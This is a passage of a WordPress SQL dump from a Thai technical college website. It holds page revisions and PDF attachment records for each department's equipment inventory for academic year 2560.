#0000ff;\">แผนกวิชาอิเล็กทรอนิกส์</span></h3>\r\n[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F02%2F%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%AD%E0%B8%B4%E0%B9%80%E0%B8%A5%E0%B9%87%E0%B8%81%E0%B8%97%E0%B8%A3%E0%B8%AD%E0%B8%99%E0%B8%B4%E0%B8%81%E0%B8%AA%E0%B9%8C.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]\r\n<h3><span style=\"color: #0000ff;\">แผนกวิชาก่อสร้าง</span></h3>\r\n[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F02%2F%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%81%E0%B9%88%E0%B8%AD%E0%B8%AA%E0%B8%A3%E0%B9%89%E0%B8%B2%E0%B8%87.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]\r\n<h3><span style=\"color: #0000ff;\">แผนกวิชาเครื่องมือวัดและควบคุม</span></h3>\r\n[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F02%2F%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B9%80%E0%B8%84%E0%B8%A3%E0%B8%B7%E0%B9%88%E0%B8%AD%E0%B8%87%E0%B8%A1%E0%B8%B7%E0%B8%AD%E0%B8%A7%E0%B8%B1%E0%B8%94%E0%B9%81%E0%B8%A5%E0%B8%B0%E0%B8%84%E0%B8%A7%E0%B8%9A%E0%B8%84%E0%B8%B8%E0%B8%A1.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]\r\n<h3><span style=\"color: #0000ff;\">แผนกวิชาปิโตรเคมี</span></h3>\r\n[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F02%2F%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%9B%E0%B8%B4%E0%B9%82%E0%B8%95%E0%B8%A3%E0%B9%80%E0%B8%84%E0%B8%A1%E0%B8%B5.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]\r\n<h3><span style=\"color: #0000ff;\">แผนกวิชาเคมีอุตสาหกรรม</span></h3>\r\n[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F02%2F%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B9%80%E0%B8%84%E0%B8%A1%E0%B8%B5%E0%B8%AD%E0%B8%B8%E0%B8%95%E0%B8%AA%E0%B8%B2%E0%B8%AB%E0%B8%81%E0%B8%A3%E0%B8%A3%E0%B8%A1.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]\r\n<h3><span style=\"color: #0000ff;\">แผนกวิชาเทคโนโลยียาง</span></h3>\r\n[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F02%2F%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B9%80%E0%B8%97%E0%B8%84%E0%B9%82%E0%B8%99%E0%B9%82%E0%B8%A5%E0%B8%A2%E0%B8%B5%E0%B8%A2%E0%B8%B2%E0%B8%87.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]\r\n<h3><span style=\"color: #0000ff;\">ประเภทวิชาพาณิชยกรรม/บริหารธุรกิจ</span></h3>\r\n<h3><span style=\"color: #0000ff;\">แผนกวิชาการบัญชี</span></h3>\r\n[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F02%2F%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%9A%E0%B8%B1%E0%B8%8D%E0%B8%8A%E0%B8%B5.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]\r\n<h3><span style=\"color: #0000ff;\">แผนกวิชาการตลาด</span></h3>\r\n[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F02%2F%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%95%E0%B8%A5%E0%B8%B2%E0%B8%94.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]\r\n<h3><span style=\"color: #0000ff;\">แผนกวิชาการเลขานุการ</span></h3>\r\n[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F02%2F%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B9%80%E0%B8%A5%E0%B8%82%E0%B8%B2%E0%B8%99%E0%B8%B8%E0%B8%81%E0%B8%B2%E0%B8%A3.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]\r\n<h3><span style=\"color: #0000ff;\">แผนกวิชาคอมพิวเตอร์ธุรกิจ</span></h3>\r\n[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F02%2F%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%84%E0%B8%AD%E0%B8%A1%E0%B8%9E%E0%B8%B4%E0%B8%A7%E0%B9%80%E0%B8%95%E0%B8%AD%E0%B8%A3%E0%B9%8C%E0%B8%98%E0%B8%B8%E0%B8%A3%E0%B8%81%E0%B8%B4%E0%B8%88.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]\r\n<h3><span style=\"color: #0000ff;\">แผนกวิชาโลจิสติกส์</span></h3>\r\n[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F02%2F%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B9%82%E0%B8%A5%E0%B8%88%E0%B8%B4%E0%B8%AA%E0%B8%95%E0%B8%B4%E0%B8%81%E0%B8%AA%E0%B9%8C.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ข้อมูลครุภัณฑ์ ปีการศึกษา 2560', '', 'inherit', 'closed', 'closed', '', '1399-revision-v1', '', '', '2018-02-28 13:02:43', '2018-02-28 06:02:43', '', 1399, 'http://www.technicrayong.ac.th/1399-revision-v1/', 0, 'revision', '', 0),
(1423, 3, '2018-02-28 13:05:35', '2018-02-28 06:05:35', '', 'แผนกวิชาผ้าและเครื่องแต่งกาย', '', 'inherit', 'closed', 'closed', '', '%e0%b9%81%e0%b8%9c%e0%b8%99%e0%b8%81%e0%b8%a7%e0%b8%b4%e0%b8%8a%e0%b8%b2%e0%b8%9c%e0%b9%89%e0%b8%b2%e0%b9%81%e0%b8%a5%e0%b8%b0%e0%b9%80%e0%b8%84%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b9%81', '', '', '2018-06-13 10:13:37', '2018-06-13 03:13:37', '', 1399, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/02/แผนกวิชาผ้าและเครื่องแต่งกาย.pdf', 0, 'attachment', 'application/pdf', 0),
(1424, 3, '2018-02-28 13:05:38', '2018-02-28 06:05:38', '', 'แผนกวิชาอาหารและโภชนาการ', '', 'inherit', 'closed', 'closed', '', '%e0%b9%81%e0%b8%9c%e0%b8%99%e0%b8%81%e0%b8%a7%e0%b8%b4%e0%b8%8a%e0%b8%b2%e0%b8%ad%e0%b8%b2%e0%b8%ab%e0%b8%b2%e0%b8%a3%e0%b9%81%e0%b8%a5%e0%b8%b0%e0%b9%82%e0%b8%a0%e0%b8%8a%e0%b8%99%e0%b8%b2%e0%b8%81', '', '', '2018-06-13 10:13:46', '2018-06-13 03:13:46', '', 1399, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/02/แผนกวิชาอาหารและโภชนาการ.pdf', 0, 'attachment', 'application/pdf', 0),
(1425, 3, '2018-02-28 13:05:40', '2018-02-28 06:05:40', '', 'แผนกวิชาคหกรรมศาสตร์', '', 'inherit', 'closed', 'closed', '', '%e0%b9%81%e0%b8%9c%e0%b8%99%e0%b8%81%e0%b8%a7%e0%b8%b4%e0%b8%8a%e0%b8%b2%e0%b8%84%e0%b8%ab%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b8%a8%e0%b8%b2%e0%b8%aa%e0%b8%95%e0%b8%a3%e0%b9%8c', '', '', '2018-06-13 10:13:27', '2018-06-13 03:13:27', '', 1399, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/02/แผนกวิชาคหกรรมศาสตร์.pdf', 0, 'attachment', 'application/pdf', 0),
(1426, 3, '2018-02-28 13:07:33', '2018-02-28 06:07:33', '<h3><span style=\"color: #0000ff;\">ประเภทวิชาอุตสาหกรรม</span></h3>\r\n<h3><span style=\"color: #0000ff;\">แผนกวิชาช่างยนต์</span></h3>\r\n[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F02%2F%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%8A%E0%B9%88%E0%B8%B2%E0%B8%87%E0%B8%A2%E0%B8%99%E0%B8%95%E0%B9%8C.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]\r\n<h3><span style=\"color: #0000ff;\">แผนกวิชาช่างกล</span></h3>\r\n[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F02%2F%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%8A%E0%B9%88%E0%B8%B2%E0%B8%87%E0%B8%81%E0%B8%A5.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]\r\n<h3><span style=\"color: #0000ff;\">แผนกวิชาช่างเชื่อม</span></h3>\r\n[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F02%2F%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%8A%E0%B9%88%E0%B8%B2%E0%B8%87%E0%B9%80%E0%B8%8A%E0%B8%B7%E0%B9%88%E0%B8%AD%E0%B8%A1.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]\r\n<h3><span style=\"color: #0000ff;\">แผนกวิชาไฟฟ้า</span></h3>\r\n[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F02%2F%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B9%84%E0%B8%9F%E0%B8%9F%E0%B9%89%E0%B8%B2.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]\r\n<h3><span style=\"color: #0000ff;\">แผนกวิชาอิเล็กทรอนิกส์</span></h3>\r\n[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F02%2F%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%AD%E0%B8%B4%E0%B9%80%E0%B8%A5%E0%B9%87%E0%B8%81%E0%B8%97%E0%B8%A3%E0%B8%AD%E0%B8%99%E0%B8%B4%E0%B8%81%E0%B8%AA%E0%B9%8C.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]\r\n<h3><span style=\"color: #0000ff;\">แผนกวิชาก่อสร้าง</span></h3>\r\n[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F02%2F%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%81%E0%B9%88%E0%B8%AD%E0%B8%AA%E0%B8%A3%E0%B9%89%E0%B8%B2%E0%B8%87.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]\r\n<h3><span style=\"color: #0000ff;\">แผนกวิชาเครื่องมือวัดและควบคุม</span></h3>\r\n[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F02%2F%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B9%80%E0%B8%84%E0%B8%A3%E0%B8%B7%E0%B9%88%E0%B8%AD%E0%B8%87%E0%B8%A1%E0%B8%B7%E0%B8%AD%E0%B8%A7%E0%B8%B1%E0%B8%94%E0%B9%81%E0%B8%A5%E0%B8%B0%E0%B8%84%E0%B8%A7%E0%B8%9A%E0%B8%84%E0%B8%B8%E0%B8%A1.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]\r\n<h3><span style=\"color: #0000ff;\">แผนกวิชาปิโตรเคมี</span></h3>\r\n[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F02%2F%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%9B%E0%B8%B4%E0%B9%82%E0%B8%95%E0%B8%A3%E0%B9%80%E0%B8%84%E0%B8%A1%E0%B8%B5.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]\r\n<h3><span style=\"color: #0000ff;\">แผนกวิชาเคมีอุตสาหกรรม</span></h3>\r\n[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F02%2F%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B9%80%E0%B8%84%E0%B8%A1%E0%B8%B5%E0%B8%AD%E0%B8%B8%E0%B8%95%E0%B8%AA%E0%B8%B2%E0%B8%AB%E0%B8%81%E0%B8%A3%E0%B8%A3%E0%B8%A1.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]\r\n<h3><span style=\"color: #0000ff;\">แผนกวิชาเทคโนโลยียาง</span></h3>\r\n[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F02%2F%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B9%80%E0%B8%97%E0%B8%84%E0%B9%82%E0%B8%99%E0%B9%82%E0%B8%A5%E0%B8%A2%E0%B8%B5%E0%B8%A2%E0%B8%B2%E0%B8%87.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]\r\n<h3><span style=\"color: #0000ff;\">ประเภทวิชาพาณิชยกรรม/บริหารธุรกิจ</span></h3>\r\n<h3><span style=\"color: #0000ff;\">แผนกวิชาการบัญชี</span></h3>\r\n[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F02%2F%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%9A%E0%B8%B1%E0%B8%8D%E0%B8%8A%E0%B8%B5.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]\r\n<h3><span style=\"color: #0000ff;\">แผนกวิชาการตลาด</span></h3>\r\n[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F02%2F%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%95%E0%B8%A5%E0%B8%B2%E0%B8%94.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]\r\n<h3><span style=\"color: #0000ff;\">แผนกวิชาการเลขานุการ</span></h3>\r\n[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F02%2F%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B9%80%E0%B8%A5%E0%B8%82%E0%B8%B2%E0%B8%99%E0%B8%B8%E0%B8%81%E0%B8%B2%E0%B8%A3.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]\r\n<h3><span style=\"color: #0000ff;\">แผนกวิชาคอมพิวเตอร์ธุรกิจ</span></h3>\r\n[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F02%2F%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%84%E0%B8%AD%E0%B8%A1%E0%B8%9E%E0%B8%B4%E0%B8%A7%E0%B9%80%E0%B8%95%E0%B8%AD%E0%B8%A3%E0%B9%8C%E0%B8%98%E0%B8%B8%E0%B8%A3%E0%B8%81%E0%B8%B4%E0%B8%88.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]\r\n<h3><span style=\"color: #0000ff;\">แผนกวิชาโลจิสติกส์</span></h3>\r\n[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F02%2F%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B9%82%E0%B8%A5%E0%B8%88%E0%B8%B4%E0%B8%AA%E0%B8%95%E0%B8%B4%E0%B8%81%E0%B8%AA%E0%B9%8C.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]\r\n<h3><span style=\"color: #0000ff;\">ประเภทวิชาคหกรรมศาสตร์</span></h3>\r\n<h3><span style=\"color: #0000ff;\">แผนกวิชาคหกรรมศาสตร์</span></h3>\r\n<h3><span style=\"color: #0000ff;\">แผนกวิชาผ้าและเครื่องแต่งกาย</span></h3>\r\n<h3><span style=\"color: #0000ff;\">แผนกวิชาอาหารและโภชนาการ</span></h3>\r\n ', 'ข้อมูลครุภัณฑ์ ปีการศึกษา 2560', '', 'inherit', 'closed', 'closed', '', '1399-revision-v1', '', '', '2018-02-28 13:07:33', '2018-02-28 06:07:33', '', 1399, 'http://www.technicrayong.ac.th/1399-revision-v1/', 0, 'revision', '', 0);
INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(1427, 3, '2018-02-28 13:09:21', '2018-02-28 06:09:21', '', 'แผนกวิชาการท่องเที่ยว', '', 'inherit', 'closed', 'closed', '', '%e0%b9%81%e0%b8%9c%e0%b8%99%e0%b8%81%e0%b8%a7%e0%b8%b4%e0%b8%8a%e0%b8%b2%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%97%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%97%e0%b8%b5%e0%b9%88%e0%b8%a2%e0%b8%a7', '', '', '2018-06-13 10:16:44', '2018-06-13 03:16:44', '', 1399, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/02/แผนกวิชาการท่องเที่ยว.pdf', 0, 'attachment', 'application/pdf', 0),
(1428, 3, '2018-02-28 13:09:25', '2018-02-28 06:09:25', '', 'แผนกวิชาการโรงแรม', '', 'inherit', 'closed', 'closed', '', '%e0%b9%81%e0%b8%9c%e0%b8%99%e0%b8%81%e0%b8%a7%e0%b8%b4%e0%b8%8a%e0%b8%b2%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%81%e0%b8%a3%e0%b8%a1', '', '', '2018-06-13 10:16:37', '2018-06-13 03:16:37', '', 1399, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/02/แผนกวิชาการโรงแรม.pdf', 0, 'attachment', 'application/pdf', 0),
(1429, 3, '2018-02-28 13:09:35', '2018-02-28 06:09:35', '', 'แผนกวิชา Central Lab', '', 'inherit', 'closed', 'closed', '', '%e0%b9%81%e0%b8%9c%e0%b8%99%e0%b8%81%e0%b8%a7%e0%b8%b4%e0%b8%8a%e0%b8%b2-central-lab', '', '', '2018-06-13 10:17:12', '2018-06-13 03:17:12', '', 1399, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/02/แผนกวิชา-Central-Lab.pdf', 0, 'attachment', 'application/pdf', 0),
(1430, 3, '2018-02-28 13:09:38', '2018-02-28 06:09:38', '', 'แผนกวิชาเทคโนโลยีสารสนเทศ', '', 'inherit', 'closed', 'closed', '', '%e0%b9%81%e0%b8%9c%e0%b8%99%e0%b8%81%e0%b8%a7%e0%b8%b4%e0%b8%8a%e0%b8%b2%e0%b9%80%e0%b8%97%e0%b8%84%e0%b9%82%e0%b8%99%e0%b9%82%e0%b8%a5%e0%b8%a2%e0%b8%b5%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%99', '', '', '2018-06-13 10:17:04', '2018-06-13 03:17:04', '', 1399, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/02/แผนกวิชาเทคโนโลยีสารสนเทศ.pdf', 0, 'attachment', 'application/pdf', 0),
(1431, 3, '2018-02-28 13:16:53', '2018-02-28 06:16:53', '', 'หมวดคณิตศาสตร์', '', 'inherit', 'closed', 'closed', '', '%e0%b8%ab%e0%b8%a1%e0%b8%a7%e0%b8%94%e0%b8%84%e0%b8%93%e0%b8%b4%e0%b8%95%e0%b8%a8%e0%b8%b2%e0%b8%aa%e0%b8%95%e0%b8%a3%e0%b9%8c', '', '', '2018-06-13 10:19:28', '2018-06-13 03:19:28', '', 1399, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/02/หมวดคณิตศาสตร์.pdf', 0, 'attachment', 'application/pdf', 0),
(1432, 3, '2018-02-28 13:16:57', '2018-02-28 06:16:57', '', 'หมวดพลานามัย', '', 'inherit', 'closed', 'closed', '', '%e0%b8%ab%e0%b8%a1%e0%b8%a7%e0%b8%94%e0%b8%9e%e0%b8%a5%e0%b8%b2%e0%b8%99%e0%b8%b2%e0%b8%a1%e0%b8%b1%e0%b8%a2', '', '', '2018-06-13 10:21:06', '2018-06-13 03:21:06', '', 1399, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/02/หมวดพลานามัย.pdf', 0, 'attachment', 'application/pdf', 0),
(1433, 3, '2018-02-28 13:17:01', '2018-02-28 06:17:01', '', 'หมวดภาษาไทย', '', 'inherit', 'closed', 'closed', '', '%e0%b8%ab%e0%b8%a1%e0%b8%a7%e0%b8%94%e0%b8%a0%e0%b8%b2%e0%b8%a9%e0%b8%b2%e0%b9%84%e0%b8%97%e0%b8%a2', '', '', '2018-06-13 10:20:13', '2018-06-13 03:20:13', '', 1399, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/02/หมวดภาษาไทย.pdf', 0, 'attachment', 'application/pdf', 0),
(1434, 3, '2018-02-28 13:17:05', '2018-02-28 06:17:05', '', 'หมวดภาษาอังกฤษ', '', 'inherit', 'closed', 'closed', '', '%e0%b8%ab%e0%b8%a1%e0%b8%a7%e0%b8%94%e0%b8%a0%e0%b8%b2%e0%b8%a9%e0%b8%b2%e0%b8%ad%e0%b8%b1%e0%b8%87%e0%b8%81%e0%b8%a4%e0%b8%a9', '', '', '2018-06-13 10:19:52', '2018-06-13 03:19:52', '', 1399, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/02/หมวดภาษาอังกฤษ.pdf', 0, 'attachment', 'application/pdf', 0),
(1435, 3, '2018-02-28 13:17:06', '2018-02-28 06:17:06', '', 'หมวดวิทยาศาสตร์', '', 'inherit', 'closed', 'closed', '', '%e0%b8%ab%e0%b8%a1%e0%b8%a7%e0%b8%94%e0%b8%a7%e0%b8%b4%e0%b8%97%e0%b8%a2%e0%b8%b2%e0%b8%a8%e0%b8%b2%e0%b8%aa%e0%b8%95%e0%b8%a3%e0%b9%8c', '', '', '2018-06-13 10:20:34', '2018-06-13 03:20:34', '', 1399, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/02/หมวดวิทยาศาสตร์.pdf', 0, 'attachment', 'application/pdf', 0),
(1436, 3, '2018-02-28 13:17:07', '2018-02-28 06:17:07', '', 'หมวดสังคมศึกษา', '', 'inherit', 'closed', 'closed', '', '%e0%b8%ab%e0%b8%a1%e0%b8%a7%e0%b8%94%e0%b8%aa%e0%b8%b1%e0%b8%87%e0%b8%84%e0%b8%a1%e0%b8%a8%e0%b8%b6%e0%b8%81%e0%b8%a9%e0%b8%b2', '', '', '2018-06-13 10:20:49', '2018-06-13 03:20:49', '', 1399, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/02/หมวดสังคมศึกษา.pdf', 0, 'attachment', 'application/pdf', 0),
(1437, 3, '2018-02-28 13:20:45', '2018-02-28 06:20:45', '<h3><span style=\"color: #0000ff;\">ประเภทวิชาอุตสาหกรรม</span></h3>\r\n<h3><span style=\"color: #0000ff;\">แผนกวิชาช่างยนต์</span></h3>\r\n[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F02%2F%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%8A%E0%B9%88%E0%B8%B2%E0%B8%87%E0%B8%A2%E0%B8%99%E0%B8%95%E0%B9%8C.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]\r\n<h3><span style=\"color: #0000ff;\">แผนกวิชาช่างกล</span></h3>\r\n[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F02%2F%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%8A%E0%B9%88%E0%B8%B2%E0%B8%87%E0%B8%81%E0%B8%A5.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]\r\n<h3><span style=\"color: #0000ff;\">แผนกวิชาช่างเชื่อม</span></h3>\r\n[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F02%2F%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%8A%E0%B9%88%E0%B8%B2%E0%B8%87%E0%B9%80%E0%B8%8A%E0%B8%B7%E0%B9%88%E0%B8%AD%E0%B8%A1.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]\r\n<h3><span style=\"color: #0000ff;\">แผนกวิชาไฟฟ้า</span></h3>\r\n[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F02%2F%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B9%84%E0%B8%9F%E0%B8%9F%E0%B9%89%E0%B8%B2.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]\r\n<h3><span style=\"color: #0000ff;\">แผนกวิชาอิเล็กทรอนิกส์</span></h3>\r\n[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F02%2F%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%AD%E0%B8%B4%E0%B9%80%E0%B8%A5%E0%B9%87%E0%B8%81%E0%B8%97%E0%B8%A3%E0%B8%AD%E0%B8%99%E0%B8%B4%E0%B8%81%E0%B8%AA%E0%B9%8C.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]\r\n<h3><span style=\"color: #0000ff;\">แผนกวิชาก่อสร้าง</span></h3>\r\n[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F02%2F%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%81%E0%B9%88%E0%B8%AD%E0%B8%AA%E0%B8%A3%E0%B9%89%E0%B8%B2%E0%B8%87.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]\r\n<h3><span style=\"color: #0000ff;\">แผนกวิชาเครื่องมือวัดและควบคุม</span></h3>\r\n[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F02%2F%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B9%80%E0%B8%84%E0%B8%A3%E0%B8%B7%E0%B9%88%E0%B8%AD%E0%B8%87%E0%B8%A1%E0%B8%B7%E0%B8%AD%E0%B8%A7%E0%B8%B1%E0%B8%94%E0%B9%81%E0%B8%A5%E0%B8%B0%E0%B8%84%E0%B8%A7%E0%B8%9A%E0%B8%84%E0%B8%B8%E0%B8%A1.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]\r\n<h3><span style=\"color: 